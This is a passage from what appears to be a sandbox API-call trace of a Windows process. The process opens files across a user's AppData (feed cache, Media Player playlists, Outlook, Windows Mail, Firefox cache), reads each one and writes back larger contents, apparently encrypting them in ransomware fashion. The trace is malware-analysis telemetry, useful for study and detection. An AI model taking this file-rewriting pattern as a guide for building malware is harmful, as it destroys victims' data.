lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.262] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6000 [0155.262] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.263] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0155.263] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0155.263] CloseHandle (hObject=0x1dc) returned 1 [0155.264] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.267] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.267] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x8000 [0155.267] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.267] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.268] ReleaseMutex (hMutex=0x168) returned 1 [0155.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index.dat", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0155.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index.dat", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="index.dat", lpUsedDefaultChar=0x0) returned 9 [0155.268] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.269] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7000 [0155.270] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.270] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7000 [0155.271] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.271] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0155.271] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0155.271] CloseHandle (hObject=0x1dc) returned 1 [0155.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.273] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.273] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x504 [0155.273] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.273] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.273] ReleaseMutex (hMutex=0x168) returned 1 [0155.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="04_Music_played_in_the_last_month.wpl", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0155.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="04_Music_played_in_the_last_month.wpl", cchWideChar=37, lpMultiByteStr=0x1fa55f4, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="04_Music_played_in_the_last_month.wpl", lpUsedDefaultChar=0x0) returned 37 [0155.274] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x504, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x345f2bc*=0x504, lpOverlapped=0x0) returned 1 [0155.279] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0155.279] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa8c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f2d0*=0xa8c, lpOverlapped=0x0) returned 1 [0155.280] CloseHandle (hObject=0x1dc) returned 1 [0155.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.282] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.282] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x437 [0155.282] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.282] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.282] ReleaseMutex (hMutex=0x168) returned 1 [0155.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="12_All_Video.wpl", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0155.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="12_All_Video.wpl", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="12_All_Video.wpl", lpUsedDefaultChar=0x0) returned 16 [0155.283] ReadFile (in: hFile=0x1dc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x437, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x345f2bc*=0x437, lpOverlapped=0x0) returned 1 [0155.297] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0155.297] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9bf, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x9bf, lpOverlapped=0x0) returned 1 [0155.297] CloseHandle (hObject=0x1dc) returned 1 [0155.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.298] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.299] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3fc [0155.299] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.299] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.299] ReleaseMutex (hMutex=0x168) returned 1 [0155.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="08_Video_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0155.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="08_Video_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa55f4, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="08_Video_rated_at_4_or_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0155.299] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3fc, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x345f2bc*=0x3fc, lpOverlapped=0x0) returned 1 [0155.301] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0155.301] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x984, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x984, lpOverlapped=0x0) returned 1 [0155.301] CloseHandle (hObject=0x1dc) returned 1 [0155.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\~last~.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\~last~.sharing.xml.obi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.303] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.303] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb9 [0155.304] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.304] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.304] ReleaseMutex (hMutex=0x168) returned 1 [0155.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="~last~.sharing.xml.obi", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0155.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="~last~.sharing.xml.obi", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="~last~.sharing.xml.obi", lpUsedDefaultChar=0x0) returned 22 [0155.304] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ee0298, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0298*, lpNumberOfBytesRead=0x345f2bc*=0xb9, lpOverlapped=0x0) returned 1 [0155.305] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0155.305] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x641, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x641, lpOverlapped=0x0) returned 1 [0155.306] CloseHandle (hObject=0x1dc) returned 1 [0155.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.307] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.307] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2000 [0155.307] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.307] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.307] ReleaseMutex (hMutex=0x168) returned 1 [0155.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edb.chk", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0155.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edb.chk", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edb.chk", lpUsedDefaultChar=0x0) returned 7 [0155.308] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x345f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0156.161] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0156.161] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0156.162] CloseHandle (hObject=0x1dc) returned 1 [0156.162] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.824] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0156.824] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xed [0156.825] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0156.825] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0156.825] ReleaseMutex (hMutex=0x168) returned 1 [0156.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Circles.htm", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0156.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Circles.htm", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Orange Circles.htm", lpUsedDefaultChar=0x0) returned 18 [0156.825] ReadFile (in: hFile=0x1d4, lpBuffer=0x2697208, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697208*, lpNumberOfBytesRead=0x345f2bc*=0xed, lpOverlapped=0x0) returned 1 [0156.826] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0156.826] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x675, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x675, lpOverlapped=0x0) returned 1 [0156.827] CloseHandle (hObject=0x1d4) returned 1 [0156.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0158.318] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0158.318] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb67e [0158.318] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0158.318] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.319] ReleaseMutex (hMutex=0x168) returned 1 [0158.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B60F3d01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B60F3d01", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B60F3d01", lpUsedDefaultChar=0x0) returned 8 [0158.319] ReadFile (in: hFile=0x1d4, lpBuffer=0x286da88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0158.322] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa67e [0158.322] ReadFile (in: hFile=0x1d4, lpBuffer=0x2875ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2875ae8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.323] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa67e [0158.324] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.324] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0158.324] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0158.324] CloseHandle (hObject=0x1d4) returned 1 [0158.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0158.326] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0158.326] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa949 [0158.326] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0158.326] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.326] ReleaseMutex (hMutex=0x168) returned 1 [0158.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="28E95d01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="28E95d01", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="28E95d01", lpUsedDefaultChar=0x0) returned 8 [0158.327] ReadFile (in: hFile=0x1d4, lpBuffer=0x286da88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0158.329] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9949 [0158.329] ReadFile (in: hFile=0x1d4, lpBuffer=0x2875ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2875ae8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.330] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9949 [0158.330] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.331] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 